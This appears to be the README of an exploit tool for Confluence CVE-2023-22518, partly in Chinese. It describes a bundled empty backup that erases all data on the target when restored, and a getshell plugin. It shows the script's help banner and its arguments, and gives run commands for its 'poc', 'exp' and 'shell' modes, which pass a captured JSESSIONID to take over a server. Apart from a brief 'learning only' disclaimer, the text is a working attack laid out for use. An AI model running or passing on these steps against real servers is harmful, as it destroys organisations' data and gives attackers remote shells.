Confluence CVE-2023-22518
xmlexport-20231127-071916-1.zip
:Confluence 空备份文件,空备份会导致恢复后丢失全部数据!!!- 备份文件可自行替换,置于脚本同级目录即可
shellplug.jar
:getshell 插件,来源于:https://github.com/youcannotseemeagain/CVE-2023-22515_RCE- 导出备份文件的接口
/setup/setup-restore.action
,需要登录且有权限
python .\CVE-2023-22518.py -h
██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██████╗ ███████╗ ██╗ █████╗
██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗╚════██╗ ╚════██╗╚════██╗██╔════╝███║██╔══██╗
██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗ █████╔╝ █████╔╝███████╗╚██║╚█████╔╝
██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚═══██╗╚════╝██╔═══╝ ██╔═══╝ ╚════██║ ██║██╔══██╗
╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗██████╔╝ ███████╗███████╗███████║ ██║╚█████╔╝
╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝╚═════╝ ╚══════╝╚══════╝╚══════╝ ╚═╝ ╚════╝
@Auth: C1ph3rX13
@Blog: https://c1ph3rx13.github.io
@Note: 代码仅供学习使用,请勿用于其他用途
optional arguments:
-h, --help show this help message and exit
-t TARGET, --target TARGET
Target Url
-id JSESSIONID, --jsessionid JSESSIONID
JSESSIONID
--timeout TIMEOUT Timeout (Default: 30 Seconds)
--proxy PROXY Proxy
python .\CVE-2023-22518.py poc -t http://IP:Port
Cookie:
JSESSIONID=754BEE347CD53ECB342B74CFFDD33B4D
python .\CVE-2023-22518.py exp -t http://IP:Port -id 754BEE347CD53ECB342B74CFFDD33B4D
Cookie:
JSESSIONID=754BEE347CD53ECB342B74CFFDD33B4D
python .\CVE-2023-22518.py shell -t http://IP:Port -id 754BEE347CD53ECB342B74CFFDD33B4D